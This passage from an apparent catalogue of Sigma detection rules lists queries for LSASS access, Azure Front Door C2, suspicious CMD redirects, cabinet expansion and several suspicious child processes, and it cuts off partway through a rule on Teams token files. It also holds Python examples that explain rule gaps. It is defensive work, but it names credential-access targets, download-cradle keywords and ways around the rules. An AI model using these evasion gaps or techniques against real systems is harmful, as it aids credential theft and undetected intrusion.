        AccessList|contains: '%%4484'
    filter_main_googleupdate:
        ProcessName|contains: ':\Windows\SystemTemp\'
        ProcessName|endswith: '\GoogleUpdate.exe'
        AccessList|contains: '%%4484'
    filter_optional_procmon:
        ProcessName|endswith:
            - '\procmon64.exe'
            - '\procmon.exe'
        AccessList|contains: '%%4484'
    condition: 1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it
level: medium
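The masks in selection_1 are easier to judge once decoded into PROCESS_* rights: 0x1410 is PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ, the minimum a memory dumper needs, while 0x1400 lacks VM_READ and only queries the process. The following Python is an added example, not part of the rule: it decodes a mask, classifies it by what the holder can do to LSASS, and replays the rule's `AccessMask|contains` substring test so it can be compared with a bit-accurate check. Two caveats fall out of it. `0x40` is a substring of `0x400`, so a handle with only PROCESS_QUERY_INFORMATION satisfies selection_1, which is part of why the rule is rated Medium FP. And PROCESS_ALL_ACCESS on Windows Vista and later is 0x1FFFFF (0x1F0FFF on older releases), which contains none of the listed strings, so a tool that simply asks for everything passes selection_1 and is left to selection_2 (event 4663). The bit constants are the documented Windows values; the sample masks are constructed.

```python
"""Decode the AccessMask values in the LSASS rule above into process rights.

Added example, not part of the rule. Bit values are the documented Windows
PROCESS_* and standard access rights. It also replays the rule's
AccessMask|contains substring test so its reach can be compared with a
bit-accurate check. Sample masks are constructed.
"""

PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
    0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE",
}
VM_READ, VM_WRITE, VM_OPERATION, CREATE_THREAD = 0x10, 0x20, 0x8, 0x2
PROCESS_ALL_ACCESS = 0x1FFFFF            # Vista and later; 0x1F0FFF on older releases

# The strings selection_1 of the rule matches with AccessMask|contains.
RULE_MASKS = ["0x40", "0x1400", "0x100000", "0x1410", "0x1010", "0x1438",
              "0x143a", "0x1418", "0x1f0fff", "0x1f1fff", "0x1f2fff", "0x1f3fff"]


def decode_mask(mask):
    """Names of every right set in an integer access mask, lowest bit first."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def classify(mask):
    """What the handle lets its holder do to LSASS: write, read, or only query it."""
    if mask & (VM_WRITE | VM_OPERATION | CREATE_THREAD):
        return "write"
    if mask & VM_READ:                      # what a credential dumper needs
        return "read"
    return "query"


def rule_selection_matches(mask_str):
    """The rule's substring semantics: AccessMask|contains over RULE_MASKS."""
    s = mask_str.lower()
    return any(m in s for m in RULE_MASKS)


def bitwise_matches(mask):
    """Bit-accurate alternative: any handle able to read or write LSASS memory."""
    return classify(mask) != "query"


def compare(masks):
    """Per mask: rights, class, rule verdict (substring) and bitwise verdict."""
    return {hex(m): (decode_mask(m), classify(m), rule_selection_matches(hex(m)), bitwise_matches(m))
            for m in masks}


if __name__ == "__main__":
    for k, (rights, cls, by_rule, by_bits) in compare([0x1410, 0x1400, 0x143a, 0x400,
                                                       PROCESS_ALL_ACCESS]).items():
        print(f"{k:>9} {cls:5} rule={by_rule!s:5} bits={by_bits!s:5} {' | '.join(rights)}")
```

Most SIEMs cannot do bitwise arithmetic on a string field at query time, which is why the rule enumerates masks as substrings; if yours can cast `AccessMask` to an integer, the `bitwise_matches` form (VM_READ or any write right set) is both tighter and immune to the 0x1FFFFF gap.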
medium Strong Medium FP
Potentially Suspicious Azure Front Door Connection
Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
status: test · author: Isaac Dunham · ATT&CK mapping: sub-technique · id: 8cb4d14e-776e-43c2-8fb9-91e7fcea32b4
carbon_black query
DestinationHostname:azurefd.net* (-((Image:brave.exe OR Image:chrome.exe OR Image:chromium.exe OR Image:firefox.exe OR Image:msedge.exe OR Image:msedgewebview2.exe OR Image:opera.exe OR Image:vivaldi.exe) OR Image:searchapp.exe OR (DestinationHostname:afdxtest.z01.azurefd.net* OR DestinationHostname:fp\-afd.azurefd.net* OR DestinationHostname:fp\-afdx\-bpdee4gtg6frejfd.z01.azurefd.net* OR DestinationHostname:roxy.azurefd.net* OR DestinationHostname:powershellinfraartifacts\-gkhedzdeaghdezhr.z01.azurefd.net* OR DestinationHostname:storage\-explorer\-publishing\-feapcgfgbzc2cjek.b01.azurefd.net* OR DestinationHostname:graph.azurefd.net*)))
view Sigma YAML
title: Potentially Suspicious Azure Front Door Connection
id: 8cb4d14e-776e-43c2-8fb9-91e7fcea32b4
status: test
description: |
    Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2)
    that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
references:
    - https://lots-project.com/site/2a2e617a75726566642e6e6574
    - https://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178
    - https://www.fortalicesolutions.com/posts/hiding-behind-the-front-door-with-azure-domain-fronting
author: Isaac Dunham
date: 2024-11-07
tags:
    - attack.command-and-control
    - attack.t1102.002
    - attack.t1090.004
    - detection.threat-hunting
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains: 'azurefd.net'
    filter_main_web_browsers:
        Image|endswith:
            - 'brave.exe'
            - 'chrome.exe'
            - 'chromium.exe'
            - 'firefox.exe'
            - 'msedge.exe'
            - 'msedgewebview2.exe'
            - 'opera.exe'
            - 'vivaldi.exe'
    filter_main_common_talkers:
        Image|endswith: 'searchapp.exe' # Windows search service uses a significant amount of Azure FD
    filter_main_known_benign_domains:
        DestinationHostname|contains:
            - 'afdxtest.z01.azurefd.net' # used by Cortana; Cisco Umbrella top 1m
            - 'fp-afd.azurefd.net' # used by Cortana; Cisco Umbrella top 1m
            - 'fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net' # used by Cortana; Cisco Umbrella top 1m
            - 'roxy.azurefd.net' # used by Cortana; Cisco Umbrella top 1m
            - 'powershellinfraartifacts-gkhedzdeaghdezhr.z01.azurefd.net' # Used by VS Code; Cisco Umbrella top 1m
            - 'storage-explorer-publishing-feapcgfgbzc2cjek.b01.azurefd.net' # Used by Azure Storage Explorer; Cisco Umbrella top 1m
            - 'graph.azurefd.net' # MS Graph; Cisco Umbrella top 1m
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2.
    - Organization-specific Azure Front Door endpoints
level: medium
medium Strong Medium FP
Potentially Suspicious CMD Shell Output Redirect
Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892
carbon_black query
(Image:\\cmd.exe OR OriginalFileName:Cmd.Exe) ((CommandLine:>*%APPDATA%\\* OR CommandLine:>*%TEMP%\\* OR CommandLine:>*%TMP%\\* OR CommandLine:>*%USERPROFILE%\\* OR CommandLine:>*C\:\\ProgramData\\* OR CommandLine:>*C\:\\Temp\\* OR CommandLine:>*C\:\\Users\\Public\\* OR CommandLine:>*C\:\\Windows\\Temp\\*) OR ((CommandLine:\ >* OR CommandLine:\">* OR CommandLine:'>*) (CommandLine:C\:\\Users\\* CommandLine:\\AppData\\Local\\*)))
view Sigma YAML
title: Potentially Suspicious CMD Shell Output Redirect
id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892
related:
    - id: aa2efee7-34dd-446e-8a37-40790a66efd7
      type: derived
    - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a
      type: similar
status: test
description: |
    Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
    This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
references:
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2024-03-19
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\cmd.exe'
        - OriginalFileName: 'Cmd.Exe'
    selection_cli_1:
        CommandLine|contains:
            # Note: Add more suspicious locations as you find them
            # Note: The space from the start is missing to cover append operations ">>"
            # Note: We use the "?" to account for both a single and a double quote
            # Note: If you want to account for more spaces which is still a valid bypass option. Use a regex with "\s"
            - '>?%APPDATA%\'
            - '>?%TEMP%\'
            - '>?%TMP%\'
            - '>?%USERPROFILE%\'
            - '>?C:\ProgramData\'
            - '>?C:\Temp\'
            - '>?C:\Users\Public\'
            - '>?C:\Windows\Temp\'
    selection_cli_2:
        CommandLine|contains:
            - ' >'
            - '">'
            - "'>"
        CommandLine|contains|all:
            - 'C:\Users\'
            - '\AppData\Local\'
    condition: selection_img and 1 of selection_cli_*
falsepositives:
    - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives
level: medium
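The comments in selection_cli_1 already spell out the trade the rule makes: `?` is Sigma's single-character wildcard, so `>?C:\Temp\` matches `> C:\Temp\` and `>"C:\Temp\` but not `hostname>C:\Temp\` (no character between `>` and the path) or `>>  C:\Temp\` (two spaces), and the comment suggests a regex with `\s` for the latter. The following Python is an added example, not the rule's code: it emulates selection_cli_1 and selection_cli_2 as written, using fnmatch for the same `?`/`*` semantics with case folded as Sigma does, and puts the suggested regex variant beside it. The command lines are constructed.

```python
"""The CMD redirect rule as written (Sigma glob semantics) next to a regex variant.

Added example, not the rule's code. fnmatch gives Sigma's wildcard semantics
('?' exactly one character, '*' any run) for selection_cli_1; the regex
follows the rule's own comment about using \\s for variable whitespace.
Command lines are constructed.
"""
import fnmatch
import re

# selection_cli_1 patterns, verbatim from the rule
CLI_1 = [">?%APPDATA%\\", ">?%TEMP%\\", ">?%TMP%\\", ">?%USERPROFILE%\\",
         ">?C:\\ProgramData\\", ">?C:\\Temp\\", ">?C:\\Users\\Public\\", ">?C:\\Windows\\Temp\\"]


def sigma_contains(value, pattern):
    """Sigma 'contains' with wildcards: case-insensitive, anywhere in the value."""
    return fnmatch.fnmatchcase(value.lower(), "*" + pattern.lower() + "*")


def rule_as_written(cmdline):
    """selection_cli_1 or selection_cli_2 (selection_img, the cmd.exe check, assumed true)."""
    low = cmdline.lower()
    cli_1 = any(sigma_contains(cmdline, p) for p in CLI_1)
    cli_2 = (any(t in low for t in (" >", '">', "'>"))
             and "c:\\users\\" in low and "\\appdata\\local\\" in low)
    return cli_1 or cli_2


# Hardened variant: '>' or '>>', any whitespace, optional quote, then a
# suspicious target, including the per-user AppData\Local path without the
# ' >' prefix requirement of selection_cli_2.
REDIRECT_RE = re.compile(
    r""">>?\s*["']?(?:"""
    r"%(?:APPDATA|TEMP|TMP|USERPROFILE)%\\"
    r"|[a-z]:\\(?:ProgramData|Temp|Users\\Public|Windows\\Temp)\\"
    r"""|[a-z]:\\Users\\[^\\"'\s]+\\AppData\\Local\\"""
    r")",
    re.IGNORECASE,
)


def regex_variant(cmdline):
    return REDIRECT_RE.search(cmdline) is not None


SAMPLES = {
    "space": "cmd.exe /c hostname > C:\\Temp\\h.txt",
    "quoted": 'cmd.exe /c whoami /all >"C:\\Users\\Public\\w.txt"',
    "no_space": "cmd.exe /c hostname>C:\\Temp\\h.txt",
    "two_spaces": "cmd.exe /c dir >>  C:\\Windows\\Temp\\d.txt",
    "appdata": "cmd.exe /c ipconfig /all > C:\\Users\\bob\\AppData\\Local\\ip.txt",
    "benign": "cmd.exe /c dir > D:\\share\\listing.txt",
}


def compare():
    """Label -> (rule as written, regex variant)."""
    return {k: (rule_as_written(v), regex_variant(v)) for k, v in SAMPLES.items()}


if __name__ == "__main__":
    for label, (as_written, hardened) in compare().items():
        print(f"{label:11} rule={as_written!s:5} regex={hardened!s:5}")
```

The `no_space` and `two_spaces` samples are the ones the rule as written misses and the regex catches. Before switching, check how your backend renders `re` modifiers: the Carbon Black query above shows the `?` already widened to `*` by the converter, so the deployed query may be broader than the YAML, and a regex rule may need a different field mapping.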
medium Strong Medium FP
Potentially Suspicious Cabinet File Expansion
Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
status: test · author: Bhabesh Raj, X__Junior (Nextron Systems) · ATT&CK mapping: technique · id: 9f107a84-532c-41af-b005-8d12a607639f
carbon_black query
(Image:\\expand.exe (CommandLine:\-F\:* OR CommandLine:\/F\:* OR CommandLine:–F\:* OR CommandLine:—F\:* OR CommandLine:―F\:*)) ((CommandLine:\:\\Perflogs\\* OR CommandLine:\:\\ProgramData* OR CommandLine:\:\\Users\\Public\\* OR CommandLine:\:\\Windows\\Temp\\* OR CommandLine:\\Admin$\\* OR CommandLine:\\AppData\\Local\\Temp\\* OR CommandLine:\\AppData\\Roaming\\* OR CommandLine:\\C$\\* OR CommandLine:\\Temporary\ Internet*) OR ((CommandLine:\:\\Users\\* CommandLine:\\Favorites\\*) OR (CommandLine:\:\\Users\\* CommandLine:\\Favourites\\*) OR (CommandLine:\:\\Users\\* CommandLine:\\Contacts\\*))) (-(ParentImage:C\:\\Program\ Files\ \(x86\)\\Dell\\UpdateService\\ServiceShell.exe CommandLine:C\:\\ProgramData\\Dell\\UpdateService\\Temp\\*))
view Sigma YAML
title: Potentially Suspicious Cabinet File Expansion
id: 9f107a84-532c-41af-b005-8d12a607639f
status: test
description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
references:
    - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll
    - https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/
author: Bhabesh Raj, X__Junior (Nextron Systems)
date: 2021-07-30
modified: 2024-11-13
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_cmd:
        Image|endswith: '\expand.exe'
        CommandLine|contains|windash: '-F:'
    selection_folders_1:
        CommandLine|contains:
            - ':\Perflogs\'
            - ':\ProgramData'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\Admin$\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\'
            - '\C$\'
            - '\Temporary Internet'
    selection_folders_2:
        - CommandLine|contains|all:
              - ':\Users\'
              - '\Favorites\'
        - CommandLine|contains|all:
              - ':\Users\'
              - '\Favourites\'
        - CommandLine|contains|all:
              - ':\Users\'
              - '\Contacts\'
    filter_optional_dell:
        # Launched by Dell ServiceShell.exe
        ParentImage: 'C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe'
        CommandLine|contains: 'C:\ProgramData\Dell\UpdateService\Temp\'
    condition: selection_cmd and 1 of selection_folders_* and not 1 of filter_optional_*
falsepositives:
    - System administrator Usage
level: medium
medium Moderate High FP
Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript
Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · id: e2812b49-bae0-4b21-b366-7c142eafcde2
carbon_black query
ScriptBlockText:Win32_NTEventlogFile* (ScriptBlockText:.BackupEventlog\(* OR ScriptBlockText:.ChangeSecurityPermissions\(* OR ScriptBlockText:.ChangeSecurityPermissionsEx\(* OR ScriptBlockText:.ClearEventLog\(* OR ScriptBlockText:.Delete\(* OR ScriptBlockText:.DeleteEx\(* OR ScriptBlockText:.Rename\(* OR ScriptBlockText:.TakeOwnerShip\(* OR ScriptBlockText:.TakeOwnerShipEx\(*)
view Sigma YAML
title: Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript
id: e2812b49-bae0-4b21-b366-7c142eafcde2
status: test
description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
references:
    - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-13
tags:
    - attack.defense-impairment
logsource:
    category: ps_script
    product: windows
    definition: bade5735-5ab0-4aa7-a642-a11be0e40872
detection:
    selection_class:
        ScriptBlockText|contains: 'Win32_NTEventlogFile'
    selection_function:
        ScriptBlockText|contains:
            - '.BackupEventlog('
            - '.ChangeSecurityPermissions('
            - '.ChangeSecurityPermissionsEx('
            - '.ClearEventLog('
            - '.Delete('
            - '.DeleteEx('
            - '.Rename('
            - '.TakeOwnerShip('
            - '.TakeOwnerShipEx('
    condition: all of selection_*
falsepositives:
    - Legitimate administration and backup scripts
level: medium
medium Moderate Medium FP
Potentially Suspicious Child Process Of ClickOnce Application
Detects potentially suspicious child processes of a ClickOnce deployment application
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · id: 67bc0e75-c0a9-4cfc-8754-84a505b63c04
carbon_black query
ParentImage:\\AppData\\Local\\Apps\\2.0\\* (Image:\\calc.exe OR Image:\\cmd.exe OR Image:\\cscript.exe OR Image:\\explorer.exe OR Image:\\mshta.exe OR Image:\\net.exe OR Image:\\net1.exe OR Image:\\nltest.exe OR Image:\\notepad.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\reg.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\schtasks.exe OR Image:\\werfault.exe OR Image:\\wscript.exe)
view Sigma YAML
title: Potentially Suspicious Child Process Of ClickOnce Application
id: 67bc0e75-c0a9-4cfc-8754-84a505b63c04
status: test
description: Detects potentially suspicious child processes of a ClickOnce deployment application
references:
    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-12
tags:
    - attack.execution
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|contains: '\AppData\Local\Apps\2.0\'
        Image|endswith:
            # Add more suspicious processes
            - '\calc.exe'
            - '\cmd.exe'
            - '\cscript.exe'
            - '\explorer.exe'
            - '\mshta.exe'
            - '\net.exe'
            - '\net1.exe'
            - '\nltest.exe'
            - '\notepad.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\reg.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\schtasks.exe'
            - '\werfault.exe'
            - '\wscript.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Strong Medium FP
Potentially Suspicious Child Process Of DiskShadow.EXE
Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8
carbon_black query
ParentImage:\\diskshadow.exe (Image:\\certutil.exe OR Image:\\cscript.exe OR Image:\\mshta.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\wscript.exe)
view Sigma YAML
title: Potentially Suspicious Child Process Of DiskShadow.EXE
id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8
related:
    - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location
      type: similar
    - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution
      type: similar
    - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned
      type: similar
    - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution
      type: similar
status: test
description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
references:
    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration
    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow
    - https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf
    - https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware
    - https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-09-15
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\diskshadow.exe'
        Image|endswith:
            # Note: add or remove additional binaries according to your org needs
            - '\certutil.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\wscript.exe'
    condition: selection
falsepositives:
    - False positives can occur in cases where admin scripts leverage the "exec" flag to execute applications
level: medium
level: medium · quality: Strong · alert volume: Medium FP
Potentially Suspicious Child Process Of VsCode
Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt at persistence via VsCode tasks or terminal profiles.
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK techniques: T1218, T1202 · rule id: 5a3164f2-b373-4152-93cf-090b13c12d27
carbon_black query
ParentImage:\\code.exe ((Image:\\calc.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\cscript.exe OR Image:\\wscript.exe) OR ((Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\cmd.exe) (CommandLine:Invoke\-Expressions* OR CommandLine:IEX* OR CommandLine:Invoke\-Command* OR CommandLine:ICM* OR CommandLine:DownloadString* OR CommandLine:rundll32* OR CommandLine:regsvr32* OR CommandLine:wscript* OR CommandLine:cscript*)) OR (Image:\:\\Users\\Public\\* OR Image:\:\\Windows\\Temp\\* OR Image:\:\\Temp\\*))
view Sigma YAML
title: Potentially Suspicious Child Process Of VsCode
id: 5a3164f2-b373-4152-93cf-090b13c12d27
status: test
description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt at persistence via VsCode tasks or terminal profiles.
references:
    - https://twitter.com/nas_bench/status/1618021838407495681
    - https://twitter.com/nas_bench/status/1618021415852335105
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-26
modified: 2023-10-25
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218
    - attack.t1202
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\code.exe'
    selection_children_images:
        Image|endswith:
            - '\calc.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\cscript.exe'
            - '\wscript.exe'
    selection_children_cli:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'Invoke-Expressions'
            - 'IEX'
            - 'Invoke-Command'
            - 'ICM'
            - 'DownloadString'
            - 'rundll32'
            - 'regsvr32'
            - 'wscript'
            - 'cscript'
    selection_children_paths:
        Image|contains:
            # Add more suspicious locations
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - ':\Temp\'
    condition: selection_parent and 1 of selection_children_*
falsepositives:
    - In development environments where VsCode is used heavily, false positives may occur when developers use tasks to compile or execute different types of code. Remove or add processes accordingly
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potentially Suspicious Child Process Of WinRAR.EXE
Detects potentially suspicious child processes of WinRAR.exe.
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK technique: T1203 · rule id: 146aace8-9bd6-42ba-be7a-0070d8027b76
carbon_black query
ParentImage:\\WinRAR.exe ((Image:\\cmd.exe OR Image:\\cscript.exe OR Image:\\mshta.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\wscript.exe) OR (OriginalFileName:Cmd.Exe OR OriginalFileName:cscript.exe OR OriginalFileName:mshta.exe OR OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll OR OriginalFileName:regsvr32.exe OR OriginalFileName:RUNDLL32.EXE OR OriginalFileName:wscript.exe))
view Sigma YAML
title: Potentially Suspicious Child Process Of WinRAR.EXE
id: 146aace8-9bd6-42ba-be7a-0070d8027b76
related:
    - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343
      type: similar
status: test
description: Detects potentially suspicious child processes of WinRAR.exe.
references:
    - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
    - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-08-31
tags:
    - attack.execution
    - attack.t1203
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\WinRAR.exe'
    selection_binaries:
        # Note: add additional binaries that the attacker might use
        - Image|endswith:
              - '\cmd.exe'
              - '\cscript.exe'
              - '\mshta.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
              - '\regsvr32.exe'
              - '\rundll32.exe'
              - '\wscript.exe'
        - OriginalFileName:
              - 'Cmd.Exe'
              - 'cscript.exe'
              - 'mshta.exe'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
              - 'regsvr32.exe'
              - 'RUNDLL32.EXE'
              - 'wscript.exe'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potentially Suspicious Child Process of KeyScrambler.exe
Detects potentially suspicious child processes of KeyScrambler.exe
status: test · author: Swachchhanda Shrawan Poudel · ATT&CK techniques: T1203, T1574.001 · rule id: ca5583e9-8f80-46ac-ab91-7f314d13b984
carbon_black query
ParentImage:\\KeyScrambler.exe ((Image:\\cmd.exe OR Image:\\cscript.exe OR Image:\\mshta.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\wscript.exe) OR (OriginalFileName:Cmd.Exe OR OriginalFileName:cscript.exe OR OriginalFileName:mshta.exe OR OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll OR OriginalFileName:regsvr32.exe OR OriginalFileName:RUNDLL32.EXE OR OriginalFileName:wscript.exe))
view Sigma YAML
title: Potentially Suspicious Child Process of KeyScrambler.exe
id: ca5583e9-8f80-46ac-ab91-7f314d13b984
related:
    - id: d2451be2-b582-4e15-8701-4196ac180260
      type: similar
status: test
description: Detects potentially suspicious child processes of KeyScrambler.exe
references:
    - https://twitter.com/DTCERT/status/1712785421845790799
author: Swachchhanda Shrawan Poudel
date: 2024-05-13
tags:
    - attack.persistence
    - attack.execution
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1203
    - attack.t1574.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\KeyScrambler.exe'
    selection_binaries:
        # Note: add additional binaries that the attacker might use
        - Image|endswith:
              - '\cmd.exe'
              - '\cscript.exe'
              - '\mshta.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
              - '\regsvr32.exe'
              - '\rundll32.exe'
              - '\wscript.exe'
        - OriginalFileName:
              - 'Cmd.Exe'
              - 'cscript.exe'
              - 'mshta.exe'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
              - 'regsvr32.exe'
              - 'RUNDLL32.EXE'
              - 'wscript.exe'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potentially Suspicious Command Targeting Teams Sensitive Files
Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.
status: test · author: @SerkinValery · ATT&CK technique: T1528 · rule id: d2eb17db-1d39-41dc-b57f-301f6512fa75
carbon_black query
(CommandLine:\\Microsoft\\Teams\\Cookies* OR CommandLine:\\Microsoft\\Teams\\Local\ Storage\\leveldb*) (-Image:\\Microsoft\\Teams\\current\\Teams.exe)
view Sigma YAML
title: Potentially Suspicious Command Targeting Teams Sensitive Files
id: d2eb17db-1d39-41dc-b57f-301f6512fa75
status: test
description: |
    Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
    The database might contain authentication tokens and other sensitive information about the logged in accounts.
references:
    - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/
    - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
author: '@SerkinValery'
date: 2022-09-16
modified: 2023-12-18
tags:
    - attack.credential-access
    - attack.t1528
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        CommandLine|contains:
            - '\Microsoft\Teams\Cookies'
            - '\Microsoft\Teams\Local Storage\leveldb'
    filter_main_legit_locations:
